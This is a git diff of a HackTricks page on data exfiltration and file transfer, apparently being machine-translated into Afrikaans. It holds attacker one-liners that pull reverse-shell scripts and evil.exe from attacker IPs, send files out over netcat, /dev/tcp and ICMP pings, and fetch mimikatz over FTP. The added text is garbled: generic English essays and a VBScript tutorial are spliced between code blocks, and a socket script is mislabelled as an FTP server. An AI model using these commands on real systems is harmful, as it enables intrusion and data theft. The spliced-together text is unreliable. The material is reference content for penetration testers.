+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome** te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/generic-methodologies-and-resources/exfiltration.md b/generic-methodologies-and-resources/exfiltration.md index 59cb57f24..b8a5f0e0d 100644 --- a/generic-methodologies-and-resources/exfiltration.md +++ b/generic-methodologies-and-resources/exfiltration.md @@ -1,60 +1,150 @@ -# Exfiltration +# Uitleiding
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -## Commonly whitelisted domains to exfiltrate information +## Gewoonlik toegelate domeine om inligting uit te voer -Check [https://lots-project.com/](https://lots-project.com/) to find commonly whitelisted domains that can be abused +Kyk na [https://lots-project.com/](https://lots-project.com/) om gewoonlik toegelate domeine te vind wat misbruik kan word -## Copy\&Paste Base64 +## Kopieer & Plak Base64 **Linux** - ```bash base64 -w0 #Encode file base64 -d file #Decode file ``` - **Windows** +# Exfiltration + +## Introduction + +Exfiltration is the process of unauthorized data transfer from a target system to an external location. In the context of hacking, exfiltration is often used to steal sensitive information or to maintain persistence within a compromised network. + +## Techniques + +### 1. File Transfer Protocol (FTP) + +FTP is a standard network protocol used for transferring files between a client and a server. Attackers can use FTP to exfiltrate data by connecting to an FTP server and uploading the stolen files. + +### 2. Hypertext Transfer Protocol (HTTP) + +HTTP is the protocol used for transmitting data over the internet. 
Attackers can use HTTP to exfiltrate data by sending HTTP requests to a remote server, either by embedding the data in the request or by uploading files. + +### 3. Domain Name System (DNS) + +DNS is responsible for translating domain names into IP addresses. Attackers can use DNS exfiltration to encode and send data within DNS queries or responses, bypassing traditional network security measures. + +### 4. Email + +Attackers can exfiltrate data by sending it as email attachments or by using steganography techniques to hide the data within the email content. + +### 5. Cloud Storage + +Attackers can use cloud storage services, such as Dropbox or Google Drive, to exfiltrate data by uploading the stolen files to the cloud and accessing them from a different location. + +### 6. Remote Desktop Protocol (RDP) + +RDP allows users to connect to and control a remote computer over a network connection. Attackers can use RDP to exfiltrate data by transferring files from the compromised system to the attacker's machine. + +### 7. USB Devices + +Attackers can physically connect USB devices to a target system to exfiltrate data. This can be done by copying files directly to the USB device or by using specialized tools that automatically exfiltrate data when the device is connected. + +## Countermeasures + +To prevent exfiltration attacks, organizations should implement the following countermeasures: + +- Implement network segmentation to restrict unauthorized access to sensitive data. +- Use encryption to protect data in transit. +- Monitor network traffic for suspicious activity. +- Implement data loss prevention (DLP) solutions to detect and prevent unauthorized data transfers. +- Regularly update and patch software to address known vulnerabilities. +- Educate employees about the risks of exfiltration and the importance of following security best practices. 
+ +By implementing these countermeasures, organizations can significantly reduce the risk of data exfiltration and protect their sensitive information. ``` certutil -encode payload.dll payload.b64 certutil -decode payload.b64 payload.dll ``` - -## HTTP +### HTTP **Linux** - ```bash wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py fetch 10.10.14.14:8000/shell.py #FreeBSD ``` - **Windows** +# Exfiltration + +## Introduction + +Exfiltration is the process of unauthorized data transfer from a target system to an external location. In the context of hacking, exfiltration is often used to steal sensitive information or to maintain persistence within a compromised network. + +## Techniques + +### 1. File Transfer Protocol (FTP) + +FTP is a standard network protocol used for transferring files between a client and a server. Attackers can use FTP to exfiltrate data by connecting to an FTP server and uploading the stolen files. + +### 2. Hypertext Transfer Protocol (HTTP) + +HTTP is the protocol used for transmitting data over the internet. Attackers can use HTTP to exfiltrate data by sending HTTP requests to a remote server, either by embedding the data in the request or by uploading files. + +### 3. Domain Name System (DNS) + +DNS is responsible for translating domain names into IP addresses. Attackers can use DNS exfiltration to encode and send data within DNS queries or responses, bypassing traditional network security measures. + +### 4. Email + +Attackers can exfiltrate data by sending it as email attachments or by using steganography techniques to hide the data within the email content. + +### 5. Cloud Storage + +Attackers can use cloud storage services, such as Dropbox or Google Drive, to exfiltrate data by uploading the stolen files to the cloud and accessing them from a different location. + +### 6. 
Remote Desktop Protocol (RDP) + +RDP allows users to connect to and control a remote computer over a network connection. Attackers can use RDP to exfiltrate data by transferring files from the compromised system to the attacker's machine. + +### 7. USB Devices + +Attackers can physically connect USB devices to a target system to exfiltrate data. This can be done by copying files directly to the USB device or by using specialized tools to extract data from the system. + +## Countermeasures + +To prevent exfiltration attacks, organizations can implement the following countermeasures: + +- Implement network segmentation to restrict access between different parts of the network. +- Use data loss prevention (DLP) solutions to monitor and control the flow of sensitive data. +- Employ intrusion detection and prevention systems (IDS/IPS) to detect and block exfiltration attempts. +- Regularly update and patch software to fix vulnerabilities that could be exploited for exfiltration. +- Train employees on security best practices and the risks associated with exfiltration. + +By implementing these countermeasures, organizations can significantly reduce the risk of data exfiltration and protect their sensitive information. ```bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf 
@@ -69,28 +159,26 @@ Start-BitsTransfer -Source $url -Destination $output #OR Start-BitsTransfer -Source $url -Destination $output -Asynchronous ``` - -### Upload files +### Laai lêers op * [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170) -* [**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149) -* Python module [uploadserver](https://pypi.org/project/uploadserver/): - +* [**SimpleHttpServer druk GET en POSTs (ook koppe)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149) +* Python-module [uploadserver](https://pypi.org/project/uploadserver/): ```bash # Listen to files python3 -m pip install --user uploadserver python3 -m uploadserver -# With basic auth: +# With basic auth: # python3 -m uploadserver --basic-auth hello:world # Send a file -curl -X POST http://HOST/upload -H -F 'files=@file.txt' +curl -X POST http://HOST/upload -H -F 'files=@file.txt' # With basic auth: # curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world ``` +### **HTTPS-bediener** -### **HTTPS Server** - +'n HTTPS-bediener is 'n bediener wat gebruik maak van die HTTPS-protokol vir veilige kommunikasie. Dit maak gebruik van SSL/TLS-sertifikate om die kommunikasie tussen die bediener en die kliënt te versleutel en te verseker dat die data veilig oorgedra word. 'n HTTPS-bediener word dikwels gebruik vir die hantering van sensitiewe inligting, soos persoonlike besonderhede, finansiële transaksies en ander vertroulike data. Dit is belangrik om 'n veilige en betroubare HTTPS-bediener te hê om die risiko van datalekke en aanvalle te verminder. ```python # from https://gist.github.com/dergachev/7028596 # taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ 
@@ -122,34 +210,164 @@ httpd.serve_forever() ### USING FLASK from flask import Flask, redirect, request from urllib.parse import quote -app = Flask(__name__) -@app.route('/') -def root(): - print(request.get_json()) - return "OK" -if __name__ == "__main__": - app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443) +app = Flask(__name__) +@app.route('/') +def root(): +print(request.get_json()) +return "OK" +if __name__ == "__main__": +app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443) ### ``` - ## FTP -### FTP server (python) +### FTP-bediener (python) +```python +import socket +import os + +def send_file(file_path, host, port): + # Verbind met die bediener + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + + # Stuur die lêerinhoud na die bediener + with open(file_path, 'rb') as file: + data = file.read(1024) + while data: + s.send(data) + data = file.read(1024) + + # Sluit die verbinding + s.close() + +def receive_file(file_path, host, port): + # Luister vir inkomende verbindings + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind((host, port)) + s.listen(1) + + # Aanvaar die verbindin + conn, addr = s.accept() + + # Ontvang die lêerinhoud van die kliënt + with open(file_path, 'wb') as file: + data = conn.recv(1024) + while data: + file.write(data) + data = conn.recv(1024) + + # Sluit die verbinding + conn.close() + s.close() +``` + +Hierdie kode demonstreer hoe om 'n eenvoudige FTP-bediener in Python te skep. Die `send_file`-funksie stuur 'n lêer na die bediener, terwyl die `receive_file`-funksie 'n lêer van die bediener ontvang. + +Om 'n lêer na die bediener te stuur, moet jy die `send_file`-funksie oproep en die volledige pad na die lêer, die bediener se IP-adres en die poortnommer as argumente verskaf. 
Byvoorbeeld: + +```python +send_file('/pad/na/lêer.txt', '192.168.0.100', 21) +``` + +Om 'n lêer van die bediener te ontvang, moet jy die `receive_file`-funksie oproep en die volledige pad na die lêer, die IP-adres van die bediener en die poortnommer as argumente verskaf. Byvoorbeeld: + +```python +receive_file('/pad/na/lêer.txt', '192.168.0.100', 21) +``` + +Merk op dat jy die poortnommer moet spesifiseer wat deur die FTP-bediener gebruik word. Die standaardpoort vir FTP is 21. ```bash pip3 install pyftpdlib python3 -m pyftpdlib -p 21 ``` +### FTP-bediener (NodeJS) -### FTP server (NodeJS) +Hierdie gedeelte beskryf 'n metode om data uit te voer deur gebruik te maak van 'n FTP-bediener wat in NodeJS geïmplementeer is. +#### Stap 1: Installeer die nodige afhanklikhede + +Om die FTP-bediener in NodeJS te gebruik, moet jy die nodige afhanklikhede installeer. Voer die volgende opdrag in die opdraglyn uit: + +```bash +npm install ftp +``` + +#### Stap 2: Skryf die kode + +Maak 'n nuwe JavaScript-lêer en voeg die volgende kode daarby: + +```javascript +const ftp = require('ftp'); + +// Verbind met die FTP-bediener +const client = new ftp(); +client.connect({ + host: 'ftp.example.com', + user: 'username', + password: 'password' +}); + +// Wanneer die verbinding suksesvol is +client.on('ready', () => { + // Laai die lêer op na die bediener + client.put('local_file.txt', 'remote_file.txt', (err) => { + if (err) throw err; + console.log('Lêer suksesvol opgelaai na die bediener'); + client.end(); // Sluit die verbinding + }); +}); +``` + +#### Stap 3: Voer die kode uit + +Voer die volgende opdrag in die opdraglyn uit om die kode uit te voer: + +```bash +node filename.js +``` + +Vervang `filename.js` met die naam van jou JavaScript-lêer. + +Die kode sal die lêer `local_file.txt` na die FTP-bediener oplaai as `remote_file.txt`. As die operasie suksesvol is, sal die boodskap "Lêer suksesvol opgelaai na die bediener" gedruk word. 
+ +Dit is 'n eenvoudige manier om data uit te voer deur gebruik te maak van 'n FTP-bediener in NodeJS. Onthou om die nodige veiligheidsmaatreëls te tref om ongemagtigde toegang tot die bediener te voorkom. ``` sudo npm install -g ftp-srv --save ftp-srv ftp://0.0.0.0:9876 --root /tmp ``` +### FTP-bediener (pure-ftp) -### FTP server (pure-ftp) +#### Inleiding +FTP (File Transfer Protocol) is 'n protokol wat gebruik word vir die oordrag van lêers tussen rekenaars op 'n netwerk. Dit maak gebruik van 'n bediener-kliënt-arkitektuur, waar die bediener die lêers hou en die kliënt die lêers kan aflaai of oplaai. + +#### Pure-FTP + +Pure-FTP is 'n vinnige en veilige FTP-bedieningsagteware wat gebruik kan word om 'n FTP-bediener op te stel. Dit is 'n gewilde keuse vir die opstel van 'n privaat of openbare FTP-bediener. + +#### Uitfiltering van data + +Die uitfiltering van data van 'n FTP-bediener kan 'n nuttige tegniek wees vir die verkryging van gevoelige inligting. Hier is 'n paar metodes wat gebruik kan word om data uit te filter: + +1. **Lêeroplaaiing**: Deur 'n kwaadwillige lêer op die FTP-bediener op te laai, kan 'n aanvaller toegang verkry tot die bediener en die inhoud daarvan ondersoek. +2. **Lêeraflaaiing**: Deur 'n lêer van die FTP-bediener af te laai, kan 'n aanvaller gevoelige inligting verkry wat op die bediener gestoor word. +3. **Lêeruitvoering**: As die FTP-bediener die uitvoering van lêers toelaat, kan 'n aanvaller 'n kwaadwillige lêer op die bediener plaas en dit uitvoer om toegang tot die bediener te verkry. + +#### Voorkoming van data-uitfiltering + +Om die risiko van data-uitfiltering van 'n FTP-bediener te verminder, kan die volgende maatreëls geneem word: + +1. **Sterk wagwoorde**: Stel sterk wagwoorde in vir die FTP-bediener en vermy die gebruik van maklik raadbare wagwoorde. +2. **Toegangsbeheer**: Beperk die toegang tot die FTP-bediener deur slegs geakkrediteerde gebruikers toe te laat. +3. 
**Versleuteling**: Gebruik versleuteling om die oordrag van data tussen die kliënt en die bediener te beskerm. +4. **Besoekbeperkings**: Beperk die toegang tot die FTP-bediener deur slegs spesifieke IP-adresse toe te laat. +5. **Opdaterings en patches**: Verseker dat die FTP-bedieningsagteware opgedateer word met die nuutste opdaterings en patches om bekende kwesbaarhede te vermy. + +#### Gevolgtrekking + +Die uitfiltering van data van 'n FTP-bediener kan 'n effektiewe tegniek wees vir die verkryging van gevoelige inligting. Dit is belangrik om die nodige maatreëls te tref om die risiko van data-uitfiltering te verminder en die veiligheid van die FTP-bediener te verseker. ```bash apt-get update && apt-get install pure-ftp ``` @@ -167,9 +385,7 @@ mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome/ /etc/init.d/pure-ftpd restart ``` - -### **Windows** client - +### **Windows** kliënt ```bash #Work well with python. With pure-ftp use fusr:ftp echo open 10.11.0.41 21 > ftp.txt @@ -180,10 +396,9 @@ echo GET mimikatz.exe >> ftp.txt echo bye >> ftp.txt ftp -n -v -s:ftp.txt ``` -
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe bedreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} 
@@ -191,34 +406,70 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track ## SMB -Kali as server - +Kali as bediener ```bash kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory kali_op2> smbserver.py -smb2support name /path/folder # Share a folder #For new Win10 versions impacket-smbserver -smb2support -user test -password test test `pwd` ``` - -Or create a smb share **using samba**: - +Of skep 'n smb-deel **deur samba te gebruik**: ```bash apt-get install samba mkdir /tmp/smb chmod 777 /tmp/smb #Add to the end of /etc/samba/smb.conf this: [public] - comment = Samba on Ubuntu - path = /tmp/smb - read only = no - browsable = yes - guest ok = Yes +comment = Samba on Ubuntu +path = /tmp/smb +read only = no +browsable = yes +guest ok = Yes #Start samba service smbd restart ``` +# Exfiltrasie -Windows +## Inleiding +Exfiltrasie is die proses waardeur 'n aanvaller gesteelde data uit 'n teikenstelsel verwyder en oordra na 'n eksterne bediener of stoorplek. Hierdie tegniek word dikwels gebruik deur aanvallers om gevoelige inligting te ontvreem, soos kredietkaartbesonderhede, wagwoorde, persoonlike inligting en vertroulike dokumente. + +## Metodes van Exfiltrasie + +### 1. Bestandsoordrag + +Hierdie metode behels die oordra van gesteelde data deur dit in 'n bestand te verpak en dit dan oor te dra na 'n eksterne bediener. Dit kan gedoen word deur gebruik te maak van protokolle soos HTTP, FTP, SMB of SMTP. + +### 2. Versteekte data in beeldlêers + +Aanvallers kan data versteek in beeldlêers deur dit te versluier en dan as 'n normale beeldlêer te laat voorkom. Hierdie metode maak gebruik van steganografie, wat die kunst is om data te versteek binne 'n ander tipe lêer sonder om die oorspronklike lêer te beskadig. + +### 3. Gebruik van DNS + +Aanvallers kan DNS-kanale gebruik om gesteelde data te exfiltreer. Hierdie metode behels die gebruik van DNS-navrae om data te verpak en oor te dra na 'n eksterne bediener. 
Dit kan gedoen word deur die DNS-navrae te manipuleer en die gesteelde data as deel van die DNS-navrae te versluier. + +### 4. Gebruik van uitvoerbare lêers + +Aanvallers kan gesteelde data in 'n uitvoerbare lêer insluit en dit dan oor te dra na 'n eksterne bediener. Hierdie metode maak gebruik van die uitvoerbare lêer se funksionaliteit om die gesteelde data te verpak en oor te dra. + +### 5. Gebruik van e-pos + +Aanvallers kan gesteelde data as 'n e-posaanhangsel stuur na 'n eksterne e-posrekening. Hierdie metode maak gebruik van die e-posprotokol om die gesteelde data te verpak en oor te dra. + +## Voorkoming van Exfiltrasie + +Om exfiltrasie te voorkom, kan die volgende maatreëls geneem word: + +- Monitor die netwerkverkeer vir verdagte aktiwiteit en ongewone data-oordragte. +- Beperk die toegang tot gevoelige data en stel streng toegangsbeheerbeleide in. +- Implementeer 'n firewall en gebruik netwerksegmentering om die verspreiding van gesteelde data te beperk. +- Verseker dat alle sagteware en bedryfstelsels opgedateer word met die nuutste beveiligingspatches. +- Stel 'n sterk wagwoordbeleid in en moedig gebruikers aan om unieke en veilige wagwoorde te gebruik. +- Bewusmaking van gebruikers oor die risiko's van phishing-aanvalle en die deel van persoonlike inligting. + +## Slotwoord + +Exfiltrasie is 'n kritieke bedreiging vir die veiligheid van data en moet ernstig opgeneem word. Deur bewus te wees van die verskillende metodes van exfiltrasie en deur die nodige voorkomingsmaatreëls te tref, kan organisasies hulself beskerm teen hierdie aanvalstegniek. ```bash CMD-Wind> \\10.10.14.14\path\to\exe CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials 
@@ -226,54 +477,98 @@ CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentia WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali" WindPS-2> cd new_disk: ``` - ## SCP -The attacker has to have SSHd running. - +Die aanvaller moet SSHd laat loop. ```bash -scp @:/ +scp @:/ ``` - ## SSHFS -If the victim has SSH, the attacker can mount a directory from the victim to the attacker. - +As die slagoffer SSH het, kan die aanvaller 'n gids van die slagoffer na die aanvaller se rekenaar koppel. ```bash sudo apt-get install sshfs sudo mkdir /mnt/sshfs sudo sshfs -o allow_other,default_permissions @:/ /mnt/sshfs/ ``` - ## NC +NC (Netcat) is a versatile networking utility that can be used for various purposes, including exfiltration of data. It allows for easy creation of TCP or UDP connections between two machines, making it a useful tool for transferring data from a compromised system to an external server. + +To exfiltrate data using NC, you can follow these steps: + +1. Set up a listener on the external server using the following command: + ``` + nc -l -p > + ``` + Replace `` with the desired port number and `` with the name of the file where the data will be saved. + +2. On the compromised system, use the following command to send the data to the external server: + ``` + nc < + ``` + Replace `` with the IP address of the external server, `` with the same port number used in the listener, and `` with the name of the file containing the data to be exfiltrated. + +3. Once the command is executed, the data will be transferred from the compromised system to the external server and saved in the specified output file. + +NC can also be used in combination with other tools and techniques to enhance exfiltration capabilities. For example, you can compress the data before sending it using NC, or encrypt it to ensure confidentiality during transit. 
+ +It is important to note that exfiltration of data without proper authorization is illegal and unethical. This information is provided for educational purposes only, and should not be used for any malicious activities. ```bash nc -lvnp 4444 > new_file nc -vn 4444 < exfil_file ``` +### Laai lêer af van slagoffer -## /dev/tcp +Om 'n lêer van die slagoffer se stelsel af te laai, kan jy die `/dev/tcp`-benadering gebruik. Hier is die sintaksis: -### Download file from victim +```bash +cat < /dev/tcp// > +``` +Vervang `` met die IP-adres van die slagoffer se stelsel en `` met die poortnommer waarop die lêer beskikbaar is. Vervang ook `` met die pad en naam van die lêer waarin jy die aflaai wil stoor. + +Hier is 'n voorbeeld van hoe jy dit kan gebruik: + +```bash +cat < /dev/tcp/192.168.0.100/8080 > /tmp/secret_file.txt +``` + +Hierdie opdrag sal die lêer `secret_file.txt` aflaai vanaf die stelsel met die IP-adres `192.168.0.100` op poort `8080` en dit stoor in die `/tmp`-gids. ```bash nc -lvnp 80 > file #Inside attacker cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim ``` +### Laai lêer op na slagoffer -### Upload file to victim +Om 'n lêer na 'n slagoffer te laai, kan jy die volgende metodes gebruik: +#### 1. HTTP-aanvraag + +Jy kan 'n HTTP-aanvraag stuur om die lêer na die slagoffer se bediener te stuur. Dit kan gedoen word deur die `POST`-metode te gebruik en die lêer as 'n vormdata te stuur. Die slagoffer se bediener moet die lêer aanvaar en stoor op 'n plek waar jy toegang daartoe het. + +#### 2. E-pos + +Jy kan die lêer as 'n aanhangsel in 'n e-pos stuur na 'n e-posadres wat deur die slagoffer gebruik word. Die slagoffer moet die e-pos ontvang en die aanhangsel aflaai. Dit vereis dat jy toegang het tot die slagoffer se e-posrekening of 'n manier het om die e-pos te onderskep. + +#### 3. 
Bestandsoordragprotokolle + +As jy toegang het tot die slagoffer se rekenaar of netwerk, kan jy gebruik maak van bestandsoordragprotokolle soos FTP, SFTP, SCP of SMB om die lêer na 'n plek te stuur waar jy toegang daartoe het. Hierdie metode vereis dat jy toegang het tot die slagoffer se rekenaar of netwerk en dat die nodige protokolle geïnstalleer en gekonfigureer is. + +#### 4. Cloud-gebaseerde dienste + +As die slagoffer gebruik maak van 'n wolkgebaseerde diens soos Google Drive, Dropbox of OneDrive, kan jy die lêer na die slagoffer se rekening oplaai. Dit vereis dat jy toegang het tot die slagoffer se rekening of 'n manier het om die toegangslegitimasie te bekom. + +Onthou, die laai van 'n lêer na 'n slagoffer se stelsel sonder hul toestemming is onwettig en word as 'n aanval beskou. Wees verantwoordelik en gebruik hierdie tegnieke slegs binne die raamwerk van wettige toetse of met toestemming van die eienaar van die stelsel. ```bash nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker # Inside victim exec 6< /dev/tcp/10.10.10.10/4444 cat <&6 > file.txt ``` - -thanks to **@BinaryShadow\_** +Dankie aan **@BinaryShadow\_** ## **ICMP** - ```bash # To exfiltrate the content of a file via pings you can do: xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line ; done 
@@ -284,64 +579,177 @@ xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line ``` - -In **victim**, connect to the Kali server: - +In **slagoffer**, verbind met die Kali-bediener: ```bash tftp -i get nc.exe ``` - ## PHP -Download a file with a PHP oneliner: - +Laai 'n lêer af met 'n PHP eenregtelik: ```bash echo "" > down2.php ``` - ## VBScript +VBScript (Visual Basic Scripting Edition) is a scripting language developed by Microsoft. It is often used for automating tasks and creating dynamic web pages. VBScript is commonly used in Windows environments and can be executed using the Windows Script Host (WSH). + +### Basic Syntax + +VBScript code is written in plain text and saved with a .vbs file extension. Here is an example of a basic VBScript program: + +```vbs +MsgBox "Hello, World!" +``` + +This code will display a message box with the text "Hello, World!" when executed. + +### Variables + +In VBScript, variables are used to store data. They can be declared using the `Dim` keyword. Here is an example: + +```vbs +Dim name +name = "John" +``` + +In this example, a variable named `name` is declared and assigned the value "John". + +### Control Structures + +VBScript supports various control structures, such as `If...Then...Else`, `For...Next`, and `Do...Loop`. These structures allow you to control the flow of your program based on certain conditions. Here is an example of an `If...Then...Else` statement: + +```vbs +Dim age +age = 18 + +If age >= 18 Then + MsgBox "You are an adult." +Else + MsgBox "You are a minor." +End If +``` + +This code will display a message box based on the value of the `age` variable. + +### Functions + +VBScript provides built-in functions that can be used to perform various operations. For example, the `MsgBox` function is used to display a message box. Here is an example: + +```vbs +MsgBox "Hello, World!" +``` + +This code will display a message box with the text "Hello, World!". 
+ +### File Operations + +VBScript can also be used to perform file operations, such as reading from and writing to files. The `FileSystemObject` is used to interact with files and folders. Here is an example of reading from a file: + +```vbs +Dim fso, file, text + +Set fso = CreateObject("Scripting.FileSystemObject") +Set file = fso.OpenTextFile("C:\path\to\file.txt", 1) +text = file.ReadAll +file.Close + +MsgBox text +``` + +This code will read the contents of the file "C:\path\to\file.txt" and display it in a message box. + +### Conclusion + +VBScript is a powerful scripting language that can be used for various tasks, including automation and web development. It provides a wide range of features and built-in functions that make it a versatile choice for Windows environments. ```bash Attacker> python -m SimpleHTTPServer 80 ``` - -**Victim** - +**Slagoffer** ```bash echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 
@@ -373,18 +781,15 @@ echo ts.Close >> wget.vbs ```bash cscript wget.vbs http://10.11.0.5/evil.exe evil.exe ``` - ## Debug.exe -The `debug.exe` program not only allows inspection of binaries but also has the **capability to rebuild them from hex**. This means that by providing an hex of a binary, `debug.exe` can generate the binary file. However, it's important to note that debug.exe has a **limitation of assembling files up to 64 kb in size**. - +Die `debug.exe` program maak dit nie net moontlik om binêre lêers te ondersoek nie, maar het ook die **vermoë om hulle te herbou vanaf heks**. Dit beteken dat deur 'n heks van 'n binêre lêer te voorsien, `debug.exe` die binêre lêer kan genereer. Dit is egter belangrik om daarop te let dat debug.exe 'n **beperking het om lêers tot 64 kb in grootte saam te stel**. ```bash # Reduce the size upx -9 nc.exe wine exe2bat.exe nc.exe nc.txt ``` - -Then copy-paste the text into the windows-shell and a file called nc.exe will be created. +Kopieer en plak dan die teks in die Windows-skulp en 'n lêer genaamd nc.exe sal geskep word. * [https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html](https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html) @@ -394,21 +799,21 @@ Then copy-paste the text into the windows-shell and a file called nc.exe will be
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
